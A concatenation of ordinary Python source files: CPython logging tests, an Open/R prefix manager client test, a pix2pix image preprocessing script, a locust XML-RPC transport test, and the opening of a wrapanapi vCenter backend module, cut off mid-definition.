self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
self.adapter.critical(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.CRITICAL)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
def test_is_enabled_for(self):
old_disable = self.adapter.logger.manager.disable
self.adapter.logger.manager.disable = 33
self.addCleanup(setattr, self.adapter.logger.manager, 'disable',
old_disable)
self.assertFalse(self.adapter.isEnabledFor(32))
def test_has_handlers(self):
self.assertTrue(self.adapter.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
self.assertFalse(self.adapter.hasHandlers())
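# --- Illustrative sketch (not part of the original test suite) ---
# LoggerAdapter.process() merges the adapter's 'extra' mapping into every
# logging call, so contextual fields become LogRecord attributes that a
# format string can reference.  The field name 'request_id' is arbitrary.
def _logger_adapter_extra_demo():
    import io
    stream = io.StringIO()
    base = logging.getLogger('adapter-demo')
    base.propagate = False
    handler = logging.StreamHandler(stream)
    handler.setFormatter(logging.Formatter('%(request_id)s %(message)s'))
    base.addHandler(handler)
    adapter = logging.LoggerAdapter(base, {'request_id': 'abc123'})
    try:
        adapter.warning('tagged with the adapter extra')
    finally:
        base.removeHandler(handler)
        handler.close()
    return stream.getvalue()   # 'abc123 tagged with the adapter extra\n'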
class LoggerTest(BaseTest):
def setUp(self):
super(LoggerTest, self).setUp()
self.recording = RecordingHandler()
self.logger = logging.Logger(name='blah')
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
self.addCleanup(logging.shutdown)
def test_set_invalid_level(self):
self.assertRaises(TypeError, self.logger.setLevel, object())
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.logger.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_log_invalid_level_with_raise(self):
with support.swap_attr(logging, 'raiseExceptions', True):
self.assertRaises(TypeError, self.logger.log, '10', 'test message')
def test_log_invalid_level_no_raise(self):
with support.swap_attr(logging, 'raiseExceptions', False):
self.logger.log('10', 'test message') # no exception happens
def test_find_caller_with_stack_info(self):
called = []
support.patch(self, logging.traceback, 'print_stack',
lambda f, file: called.append(file.getvalue()))
self.logger.findCaller(stack_info=True)
self.assertEqual(len(called), 1)
self.assertEqual('Stack (most recent call last):\n', called[0])
def test_make_record_with_extra_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
rv = logging._logRecordFactory(name, level, fn, lno, msg, args,
exc_info, func, sinfo)
for key in ('message', 'asctime') + tuple(rv.__dict__.keys()):
extra = {key: 'some value'}
self.assertRaises(KeyError, self.logger.makeRecord, name, level,
fn, lno, msg, args, exc_info,
extra=extra, sinfo=sinfo)
def test_make_record_with_extra_no_overwrite(self):
name = 'my record'
level = 13
fn = lno = msg = args = exc_info = func = sinfo = None
extra = {'valid_key': 'some value'}
result = self.logger.makeRecord(name, level, fn, lno, msg, args,
exc_info, extra=extra, sinfo=sinfo)
self.assertIn('valid_key', result.__dict__)
def test_has_handlers(self):
self.assertTrue(self.logger.hasHandlers())
for handler in self.logger.handlers:
self.logger.removeHandler(handler)
self.assertFalse(self.logger.hasHandlers())
def test_has_handlers_no_propagate(self):
child_logger = logging.getLogger('blah.child')
child_logger.propagate = False
self.assertFalse(child_logger.hasHandlers())
def test_is_enabled_for(self):
old_disable = self.logger.manager.disable
self.logger.manager.disable = 23
self.addCleanup(setattr, self.logger.manager, 'disable', old_disable)
self.assertFalse(self.logger.isEnabledFor(22))
def test_root_logger_aliases(self):
root = logging.getLogger()
self.assertIs(root, logging.root)
self.assertIs(root, logging.getLogger(None))
self.assertIs(root, logging.getLogger(''))
self.assertIs(root, logging.getLogger('foo').root)
self.assertIs(root, logging.getLogger('foo.bar').root)
self.assertIs(root, logging.getLogger('foo').parent)
self.assertIsNot(root, logging.getLogger('\0'))
self.assertIsNot(root, logging.getLogger('foo.bar').parent)
def test_invalid_names(self):
self.assertRaises(TypeError, logging.getLogger, any)
self.assertRaises(TypeError, logging.getLogger, b'foo')
class BaseFileTest(BaseTest):
"Base class for handler tests that write log files"
def setUp(self):
BaseTest.setUp(self)
fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-")
os.close(fd)
self.rmfiles = []
def tearDown(self):
for fn in self.rmfiles:
os.unlink(fn)
if os.path.exists(self.fn):
os.unlink(self.fn)
BaseTest.tearDown(self)
def assertLogFile(self, filename):
"Assert a log file is there and register it for deletion"
self.assertTrue(os.path.exists(filename),
msg="Log file %r does not exist" % filename)
self.rmfiles.append(filename)
class FileHandlerTest(BaseFileTest):
def test_delay(self):
os.unlink(self.fn)
fh = logging.FileHandler(self.fn, delay=True)
self.assertIsNone(fh.stream)
self.assertFalse(os.path.exists(self.fn))
fh.handle(logging.makeLogRecord({}))
self.assertIsNotNone(fh.stream)
self.assertTrue(os.path.exists(self.fn))
fh.close()
class RotatingFileHandlerTest(BaseFileTest):
def next_rec(self):
return logging.LogRecord('n', logging.DEBUG, 'p', 1,
self.next_message(), None, None, None)
def test_should_not_rollover(self):
# If maxbytes is zero rollover never occurs
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0)
self.assertFalse(rh.shouldRollover(None))
rh.close()
def test_should_rollover(self):
rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1)
self.assertTrue(rh.shouldRollover(self.next_rec()))
rh.close()
def test_file_created(self):
# checks that the file is created and assumes it was created
# by us
rh = logging.handlers.RotatingFileHandler(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.close()
def test_rollover_filenames(self):
def namer(name):
return name + ".test"
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.namer = namer
rh.emit(self.next_rec())
self.assertLogFile(self.fn)
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".1"))
rh.emit(self.next_rec())
self.assertLogFile(namer(self.fn + ".2"))
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
@support.requires_zlib
def test_rotator(self):
def namer(name):
return name + ".gz"
def rotator(source, dest):
with open(source, "rb") as sf:
data = sf.read()
compressed = zlib.compress(data, 9)
with open(dest, "wb") as df:
df.write(compressed)
os.remove(source)
rh = logging.handlers.RotatingFileHandler(
self.fn, backupCount=2, maxBytes=1)
rh.rotator = rotator
rh.namer = namer
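        # maxBytes=1 makes the handler roll over on effectively every emit, so each
        # rolled-over file holds at most one record; rotator() gzips it and namer()
        # appends the ".gz" suffix that the assertions below rely on.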
m1 = self.next_rec()
rh.emit(m1)
self.assertLogFile(self.fn)
m2 = self.next_rec()
rh.emit(m2)
fn = namer(self.fn + ".1")
self.assertLogFile(fn)
newline = os.linesep
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
self.assertLogFile(fn)
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m1.msg + newline)
rh.emit(self.next_rec())
fn = namer(self.fn + ".2")
with open(fn, "rb") as f:
compressed = f.read()
data = zlib.decompress(compressed)
self.assertEqual(data.decode("ascii"), m2.msg + newline)
self.assertFalse(os.path.exists(namer(self.fn + ".3")))
rh.close()
class TimedRotatingFileHandlerTest(BaseFileTest):
# other test methods added below
def test_rollover(self):
fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S',
backupCount=1)
fmt = logging.Formatter('%(asctime)s %(message)s')
fh.setFormatter(fmt)
r1 = logging.makeLogRecord({'msg': 'testing - initial'})
fh.emit(r1)
self.assertLogFile(self.fn)
time.sleep(1.1) # a little over a second ...
r2 = logging.makeLogRecord({'msg': 'testing - after delay'})
fh.emit(r2)
fh.close()
# At this point, we should have a recent rotated file which we
# can test for the existence of. However, in practice, on some
# machines which run really slowly, we don't know how far back
# in time to go to look for the log file. So, we go back a fair
# bit, and stop as soon as we see a rotated file. In theory this
# could of course still fail, but the chances are lower.
found = False
now = datetime.datetime.now()
GO_BACK = 5 * 60 # seconds
for secs in range(GO_BACK):
prev = now - datetime.timedelta(seconds=secs)
fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S")
found = os.path.exists(fn)
if found:
self.rmfiles.append(fn)
break
msg = 'No rotated files found, went back %d seconds' % GO_BACK
if not found:
#print additional diagnostics
dn, fn = os.path.split(self.fn)
files = [f for f in os.listdir(dn) if f.startswith(fn)]
print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr)
print('The only matching files are: %s' % files, file=sys.stderr)
for f in files:
print('Contents of %s:' % f)
path = os.path.join(dn, f)
with open(path, 'r') as tf:
print(tf.read())
self.assertTrue(found, msg=msg)
def test_invalid(self):
assertRaises = self.assertRaises
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'X', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W', delay=True)
assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler,
self.fn, 'W7', delay=True)
def test_compute_rollover_daily_attime(self):
currentTime = 0
atTime = datetime.time(12, 0, 0)
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=True,
atTime=atTime)
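        # currentTime == 0 is midnight UTC at the epoch, so with atTime=12:00 the first
        # rollover lands 12 hours in; once 13 hours have elapsed, the next rollover is
        # the following day's 12:00, i.e. 36 hours from the epoch.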
try:
actual = rh.computeRollover(currentTime)
self.assertEqual(actual, currentTime + 12 * 60 * 60)
actual = rh.computeRollover(currentTime + 13 * 60 * 60)
self.assertEqual(actual, currentTime + 36 * 60 * 60)
finally:
rh.close()
#@unittest.skipIf(True, 'Temporarily skipped while failures investigated.')
def test_compute_rollover_weekly_attime(self):
currentTime = int(time.time())
today = currentTime - currentTime % 86400
atTime = datetime.time(12, 0, 0)
wday = time.gmtime(today).tm_wday
for day in range(7):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when='W%d' % day, interval=1, backupCount=0, utc=True,
atTime=atTime)
try:
if wday > day:
# The rollover day has already passed this week, so we
# go over into next week
expected = (7 - wday + day)
else:
expected = (day - wday)
# At this point expected is in days from now, convert to seconds
expected *= 24 * 60 * 60
# Add in the rollover time
expected += 12 * 60 * 60
# Add in adjustment for today
expected += today
actual = rh.computeRollover(today)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
if day == wday:
# goes into following week
expected += 7 * 24 * 60 * 60
actual = rh.computeRollover(today + 13 * 60 * 60)
if actual != expected:
print('failed in timezone: %d' % time.timezone)
print('local vars: %s' % locals())
self.assertEqual(actual, expected)
finally:
rh.close()
def secs(**kw):
return datetime.timedelta(**kw) // datetime.timedelta(seconds=1)
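# Generate a test_compute_rollover_<when> method for each (when, expected offset) pair
# below; the default arguments in the generated function freeze 'when' and 'exp' per test.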
for when, exp in (('S', 1),
('M', 60),
('H', 60 * 60),
('D', 60 * 60 * 24),
('MIDNIGHT', 60 * 60 * 24),
# current time (epoch start) is a Thursday, W0 means Monday
('W0', secs(days=4, hours=24)),
):
def test_compute_rollover(self, when=when, exp=exp):
rh = logging.handlers.TimedRotatingFileHandler(
self.fn, when=when, interval=1, backupCount=0, utc=True)
currentTime = 0.0
actual = rh.computeRollover(currentTime)
if exp != actual:
# Failures occur on some systems for MIDNIGHT and W0.
# Print detailed calculation for MIDNIGHT so we can try to see
# what's going on
if when == 'MIDNIGHT':
try:
if rh.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
# r is the number of seconds left between now and midnight
r = logging.handlers._MIDNIGHT - ((currentHour * 60 +
currentMinute) * 60 +
currentSecond)
result = currentTime + r
print('t: %s (%s)' % (t, rh.utc), file=sys.stderr)
print('currentHour: %s' % currentHour, file=sys.stderr)
print('currentMinute: %s' % currentMinute, file=sys.stderr)
print('currentSecond: %s' % currentSecond, file=sys.stderr)
print('r: %s' % r, file=sys.stderr)
print('result: %s' % result, file=sys.stderr)
except Exception:
print('exception in diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr)
self.assertEqual(exp, actual)
rh.close()
setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover)
@unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil/pywintypes required for this test.')
class NTEventLogHandlerTest(BaseTest):
def test_basic(self):
logtype = 'Application'
elh = win32evtlog.OpenEventLog(None, logtype)
num_recs = win32evtlog.GetNumberOfEventLogRecords(elh)
try:
h = logging.handlers.NTEventLogHandler('test_logging')
except pywintypes.error as e:
if e.winerror == 5: # access denied
raise unittest.SkipTest('Insufficient privileges to run test')
raise
r = logging.makeLogRecord({'msg': 'Test Log Message'})
h.handle(r)
h.close()
# Now see if the event is recorded
self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh))
flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \
win32evtlog.EVENTLOG_SEQUENTIAL_READ
found = False
GO_BACK = 100
events = win32evtlog.ReadEventLog(elh, flags, GO_BACK)
for e in events:
if e.SourceName != 'test_logging':
continue
msg = win32evtlogutil.SafeFormatMessage(e, logtype)
if msg != 'Test Log Message\r\n':
continue
found = True
break
msg = 'Record not found in event log, went back %d records' % GO_BACK
self.assertTrue(found, msg=msg)
# Set the locale to the platform-dependent default. I have no idea
# why the test does this, but in any case we save the current locale
# first and restore it at the end.
@support.run_with_locale('LC_ALL', '')
def test_main():
support.run_unittest(
BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest,
HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest,
DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest,
ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest,
StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest,
QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest,
LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest,
RotatingFileHandlerTest, LastResortTest, LogRecordTest,
ExceptionTest, SysLogHandlerTest, HTTPHandlerTest,
NTEventLogHandlerTest, TimedRotatingFileHandlerTest,
UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest)
if __name__ == "__main__":
test_main()
|
prefix_mgr_client_tests.py
|
#!/usr/bin/env python
#
# Copyright (c) 2014-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from openr.utils import socket
from openr.clients import prefix_mgr_client
from openr.PrefixManager import ttypes as prefix_mgr_types
from openr.Lsdb import ttypes as lsdb_types
from openr.cli.utils.utils import ip_str_to_prefix, sprint_prefix
import zmq
import unittest
from multiprocessing import Process
prefix_entry1 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:1/128'),
type=lsdb_types.PrefixType.LOOPBACK)
prefix_entry2 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:2/128'),
type=lsdb_types.PrefixType.LOOPBACK)
prefix_entry3 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:3/128'),
type=lsdb_types.PrefixType.LOOPBACK)
class PrefixMgr():
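    """Minimal stand-in for the PrefixManager service used by these tests: binds a REP
    socket and answers ADD_PREFIXES, WITHDRAW_PREFIXES and GET_ALL_PREFIXES requests."""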
def __init__(self, zmq_ctx, url):
self._prefix_mgr_server_socket = socket.Socket(zmq_ctx, zmq.REP)
self._prefix_mgr_server_socket.bind(url)
self._prefix_map = {sprint_prefix(prefix_entry1.prefix): prefix_entry1,
sprint_prefix(prefix_entry2.prefix): prefix_entry2,
sprint_prefix(prefix_entry3.prefix): prefix_entry3}
def process_request(self):
req = self._prefix_mgr_server_socket.recv_thrift_obj(
prefix_mgr_types.PrefixManagerRequest)
if req.cmd == prefix_mgr_types.PrefixManagerCommand.ADD_PREFIXES:
for prefix_entry in req.prefixes:
self._prefix_map[sprint_prefix(prefix_entry.prefix)] = prefix_entry
self._prefix_mgr_server_socket.send_thrift_obj(
prefix_mgr_types.PrefixManagerResponse(success=True))
if req.cmd == prefix_mgr_types.PrefixManagerCommand.WITHDRAW_PREFIXES:
success = False
for prefix_entry in req.prefixes:
prefix_str = sprint_prefix(prefix_entry.prefix)
if prefix_str in self._prefix_map:
del self._prefix_map[prefix_str]
success = True
self._prefix_mgr_server_socket.send_thrift_obj(
prefix_mgr_types.PrefixManagerResponse(success=success))
if req.cmd == prefix_mgr_types.PrefixManagerCommand.GET_ALL_PREFIXES:
resp = prefix_mgr_types.PrefixManagerResponse()
            resp.prefixes = list(self._prefix_map.values())
resp.success = True
self._prefix_mgr_server_socket.send_thrift_obj(resp)
class TestPrefixMgrClient(unittest.TestCase):
def test(self):
PrefixMgr(zmq.Context(), "tcp://*:5000")
num_req = 5
def _prefix_mgr_server():
prefix_mgr_server = PrefixMgr(zmq.Context(), "tcp://*:5000")
for _ in range(num_req):
prefix_mgr_server.process_request()
def _prefix_mgr_client():
prefix_mgr_client_inst = prefix_mgr_client.PrefixMgrClient(
zmq.Context(), "tcp://localhost:5000")
resp = prefix_mgr_client_inst.add_prefix(
['2620:0:1cff:dead:bef1:ffff:ffff:4/128'], 'LOOPBACK')
self.assertTrue(resp.success)
resp = prefix_mgr_client_inst.view_prefix()
prefix_entry4 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:4/128'),
type=lsdb_types.PrefixType.LOOPBACK)
self.assertTrue(resp.success)
self.assertTrue(prefix_entry4 in resp.prefixes)
resp = prefix_mgr_client_inst.withdraw_prefix(
['2620:0:1cff:dead:bef1:ffff:ffff:4/128'])
self.assertTrue(resp.success)
resp = prefix_mgr_client_inst.view_prefix()
self.assertTrue(resp.success)
self.assertFalse(prefix_entry4 in resp.prefixes)
resp = prefix_mgr_client_inst.withdraw_prefix(
['2620:0:1cff:dead:bef1:ffff:ffff:5/128'])
self.assertFalse(resp.success)
p = Process(target=_prefix_mgr_server)
p.start()
q = Process(target=_prefix_mgr_client)
q.start()
p.join()
q.join()
|
process.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import tempfile
import subprocess
import tensorflow as tf
import numpy as np
import tfimage as im
import threading
import time
import multiprocessing
edge_pool = None
parser = argparse.ArgumentParser()
parser.add_argument("--input_dir", required=True, help="path to folder containing images")
parser.add_argument("--output_dir", required=True, help="output path")
parser.add_argument("--operation", required=True, choices=["grayscale", "resize", "blank", "combine", "edges"])
parser.add_argument("--workers", type=int, default=1, help="number of workers")
# resize
parser.add_argument("--pad", action="store_true", help="pad instead of crop for resize operation")
parser.add_argument("--size", type=int, default=256, help="size to use for resize operation")
# combine
parser.add_argument("--b_dir", type=str, help="path to folder containing B images for combine operation")
a = parser.parse_args()
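# Illustrative invocations (directory names here are placeholders, not paths from the
# original project):
#   python process.py --input_dir photos --output_dir scaled --operation resize --size 256
#   python process.py --input_dir a_dir --b_dir b_dir --output_dir ab_dir --operation combine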
if __name__ == '__main__':
def resize(src):
height, width, _ = src.shape
dst = src
if height != width:
if a.pad:
size = max(height, width)
# pad to correct ratio
oh = (size - height) // 2
ow = (size - width) // 2
dst = im.pad(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
else:
# crop to correct ratio
size = min(height, width)
oh = (height - size) // 2
ow = (width - size) // 2
dst = im.crop(image=dst, offset_height=oh, offset_width=ow, target_height=size, target_width=size)
assert(dst.shape[0] == dst.shape[1])
size, _, _ = dst.shape
if size > a.size:
dst = im.downscale(images=dst, size=[a.size, a.size])
elif size < a.size:
dst = im.upscale(images=dst, size=[a.size, a.size])
return dst
def blank(src):
height, width, _ = src.shape
if height != width:
raise Exception("non-square image")
image_size = width
size = int(image_size * 0.3)
offset = int(image_size / 2 - size / 2)
dst = src
dst[offset:offset + size,offset:offset + size,:] = np.ones([size, size, 3])
return dst
def combine(src, src_path):
if a.b_dir is None:
raise Exception("missing b_dir")
# find corresponding file in b_dir, could have a different extension
basename, _ = os.path.splitext(os.path.basename(src_path))
for ext in [".png", ".jpg"]:
sibling_path = os.path.join(a.b_dir, basename + ext)
if os.path.exists(sibling_path):
sibling = im.load(sibling_path)
break
else:
raise Exception("could not find sibling image for " + src_path)
# make sure that dimensions are correct
height, width, _ = src.shape
if height != sibling.shape[0] or width != sibling.shape[1]:
raise Exception("differing sizes")
# convert both images to RGB if necessary
if src.shape[2] == 1:
src = im.grayscale_to_rgb(images=src)
if sibling.shape[2] == 1:
sibling = im.grayscale_to_rgb(images=sibling)
# remove alpha channel
if src.shape[2] == 4:
src = src[:,:,:3]
if sibling.shape[2] == 4:
sibling = sibling[:,:,:3]
return np.concatenate([src, sibling], axis=1)
def grayscale(src):
return im.grayscale_to_rgb(images=im.rgb_to_grayscale(images=src))
net = None
def run_caffe(src):
# lazy load caffe and create net
global net
if net is None:
# don't require caffe unless we are doing edge detection
os.environ["GLOG_minloglevel"] = "2" # disable logging from caffe
import caffe
# using this requires using the docker image or assembling a bunch of dependencies
# and then changing these hardcoded paths
net = caffe.Net("./caffe/examples/hed/deploy.prototxt", "./caffe/hed_pretrained_bsds.caffemodel", caffe.TEST)
net.blobs["data"].reshape(1, np.array(src).size)
net.blobs["data"].data[...] = src
net.forward()
return net.blobs["sigmoid-fuse"].data[0][0,:,:]
def edges(src):
# based on https://github.com/phillipi/pix2pix/blob/master/scripts/edges/batch_hed.py
# and https://github.com/phillipi/pix2pix/blob/master/scripts/edges/PostprocessHED.m
import scipy.io
src = src * 255
border = 128 # put a padding around images since edge detection seems to detect edge of image
src = src[:,:,:3] # remove alpha channel if present
src = np.pad(src, ((border, border), (border, border), (0,0)), "reflect")
src = src[:,:,::-1]
src = src - np.array((104.00698793,116.66876762,122.67891434))
src = src.transpose((2, 0, 1))
# [height, width, channels] => [batch, channel, height, width]
        fuse = edge_pool.apply(run_caffe, [src])
fuse = fuse[border:-border, border:-border]
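        # At this point 'fuse' holds the HED edge-probability map cropped back to the
        # original image size; the Octave snippet below thins it into clean binary edges.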
with tempfile.NamedTemporaryFile(suffix=".png") as png_file, tempfile.NamedTemporaryFile(suffix=".mat") as mat_file:
scipy.io.savemat(mat_file.name, {"input": fuse})
octave_code = r"""
E = 1-load(input_path).input;
E = imresize(E, [image_width,image_width]);
E = 1 - E;
E = single(E);
[Ox, Oy] = gradient(convTri(E, 4), 1);
[Oxx, ~] = gradient(Ox, 1);
[Oxy, Oyy] = gradient(Oy, 1);
O = mod(atan(Oyy .* sign(-Oxy) ./ (Oxx + 1e-5)), pi);
E = edgesNmsMex(E, O, 1, 5, 1.01, 1);
E = double(E >= max(eps, threshold));
E = bwmorph(E, 'thin', inf);
E = bwareaopen(E, small_edge);
E = 1 - E;
E = uint8(E * 255);
imwrite(E, output_path);
"""
config = dict(
input_path="'%s'" % mat_file.name,
output_path="'%s'" % png_file.name,
image_width=256,
threshold=25.0/255.0,
small_edge=5,
)
args = ["octave"]
for k, v in config.items():
args.extend(["--eval", "%s=%s;" % (k, v)])
args.extend(["--eval", octave_code])
try:
subprocess.check_output(args, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
print("octave failed")
print("returncode:", e.returncode)
print("output:", e.output)
raise
return im.load(png_file.name)
def process(src_path, dst_path):
src = im.load(src_path)
if a.operation == "grayscale":
dst = grayscale(src)
elif a.operation == "resize":
dst = resize(src)
elif a.operation == "blank":
dst = blank(src)
elif a.operation == "combine":
dst = combine(src, src_path)
elif a.operation == "edges":
dst = edges(src)
else:
raise Exception("invalid operation")
im.save(dst, dst_path)
complete_lock = threading.Lock()
start = None
num_complete = 0
total = 0
def complete():
global num_complete, rate, last_complete
with complete_lock:
num_complete += 1
now = time.time()
elapsed = now - start
rate = num_complete / elapsed
if rate > 0:
remaining = (total - num_complete) / rate
else:
remaining = 0
print("%d/%d complete %0.2f images/sec %dm%ds elapsed %dm%ds remaining" % (num_complete, total, rate, elapsed // 60, elapsed % 60, remaining // 60, remaining % 60))
last_complete = now
def main():
if not os.path.exists(a.output_dir):
os.makedirs(a.output_dir)
src_paths = []
dst_paths = []
skipped = 0
for src_path in im.find(a.input_dir):
name, _ = os.path.splitext(os.path.basename(src_path))
dst_path = os.path.join(a.output_dir, name + ".png")
if os.path.exists(dst_path):
skipped += 1
else:
src_paths.append(src_path)
dst_paths.append(dst_path)
print("skipping %d files that already exist" % skipped)
global total
total = len(src_paths)
print("processing %d files" % total)
global start
start = time.time()
if a.operation == "edges":
# use a multiprocessing pool for this operation so it can use multiple CPUs
# create the pool before we launch processing threads
global edge_pool
edge_pool = multiprocessing.Pool(a.workers)
if a.workers == 1:
with tf.Session() as sess:
for src_path, dst_path in zip(src_paths, dst_paths):
process(src_path, dst_path)
complete()
else:
            queue = tf.train.input_producer(list(zip(src_paths, dst_paths)), shuffle=False, num_epochs=1)
dequeue_op = queue.dequeue()
def worker(coord):
with sess.as_default():
while not coord.should_stop():
try:
src_path, dst_path = sess.run(dequeue_op)
except tf.errors.OutOfRangeError:
coord.request_stop()
break
process(src_path, dst_path)
complete()
# init epoch counter for the queue
local_init_op = tf.local_variables_initializer()
with tf.Session() as sess:
sess.run(local_init_op)
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(coord=coord)
for i in range(a.workers):
t = threading.Thread(target=worker, args=(coord,))
t.start()
threads.append(t)
try:
coord.join(threads)
except KeyboardInterrupt:
coord.request_stop()
coord.join(threads)
main()
|
test_transport.py
|
import unittest
from threading import Thread
from six.moves.xmlrpc_client import ServerProxy
from locust_xmlrpc import LocustXmlRpcTransport
from locust.stats import global_stats
class TestTransport(unittest.TestCase):
def setUp(self):
from .server import server, start_server
self.server = server
Thread(target=start_server).start()
self.client = ServerProxy(
'http://localhost:8000/RPC2',
transport=LocustXmlRpcTransport()
)
global_stats.reset_all()
def test_returns_something(self):
res = self.client.add(2, 2)
self.assertEqual(res, 4)
stats = global_stats.get('/RPC2', 'xmlrpc')
self.assertEqual(stats.num_requests, 1)
def test_failure(self):
self.client.failure('01', 'Test Error')
stats = global_stats.get('/RPC2', 'xmlrpc')
self.assertEqual(stats.num_failures, 1)
def test_failure_not_found(self):
self.client.method_doesnt_exist()
stats = global_stats.get('/RPC2', 'xmlrpc')
self.assertEqual(stats.num_failures, 1)
def test_delay(self):
delayed_ms = 500
res = self.client.delayed(delayed_ms)
stats = global_stats.get('/RPC2', 'xmlrpc')
self.assertEqual(res, delayed_ms)
self.assertEqual(stats.num_requests, 1)
self.assertGreaterEqual(stats.avg_response_time, delayed_ms)
def tearDown(self):
self.server.shutdown()
if __name__ == '__main__':
unittest.main()
|
virtualcenter.py
|
# coding: utf-8
"""Backend management system classes
Used to communicate with providers without using CFME facilities
"""
from __future__ import absolute_import
import atexit
import operator
import re
import ssl
import threading
import time
from datetime import datetime
from distutils.version import LooseVersion
from functools import partial
import pytz
import six
from cached_property import threaded_cached_property
from pyVim.connect import Disconnect, SmartConnect
from pyVmomi import vim, vmodl
from wait_for import TimedOutError, wait_for
from wrapanapi.entities import (Template, TemplateMixin, Vm, VmMixin,
VmState)
from wrapanapi.entities.base import Entity
from wrapanapi.exceptions import (HostNotRemoved, NotFoundError,
VMCreationDateError, VMInstanceNotCloned,
VMInstanceNotFound, VMInstanceNotSuspended,
VMNotFoundViaIP)
from wrapanapi.systems.base import System
SELECTION_SPECS = [
'resource_pool_traversal_spec',
'resource_pool_vm_traversal_spec',
'folder_traversal_spec',
'datacenter_host_traversal_spec',
'datacenter_vm_traversal_spec',
'compute_resource_rp_traversal_spec',
'compute_resource_host_traversal_spec',
'host_vm_traversal_spec',
'datacenter_datastore_traversal_spec'
]
TRAVERSAL_SPECS = [
{
'name': 'resource_pool_traversal_spec',
'type': vim.ResourcePool,
'path': 'resourcePool',
'select_indices': [0, 1]
},
{
'name': 'resource_pool_vm_traversal_spec',
'type': vim.ResourcePool,
'path': 'vm',
'select_indices': []
},
{
'name': 'compute_resource_rp_traversal_spec',
'type': vim.ComputeResource,
'path': 'resourcePool',
'select_indices': [0, 1]
},
{
'name': 'compute_resource_host_traversal_spec',
'type': vim.ComputeResource,
'path': 'host',
'select_indices': []
},
{
'name': 'datacenter_host_traversal_spec',
'type': vim.Datacenter,
'path': 'hostFolder',
'select_indices': [2]
},
{
'name': 'datacenter_datastore_traversal_spec',
'type': vim.Datacenter,
'path': 'datastoreFolder',
'select_indices': [2]
},
{
'name': 'datacenter_vm_traversal_spec',
'type': vim.Datacenter,
'path': 'vmFolder',
'select_indices': [2]
},
{
'name': 'host_vm_traversal_spec',
'type': vim.HostSystem,
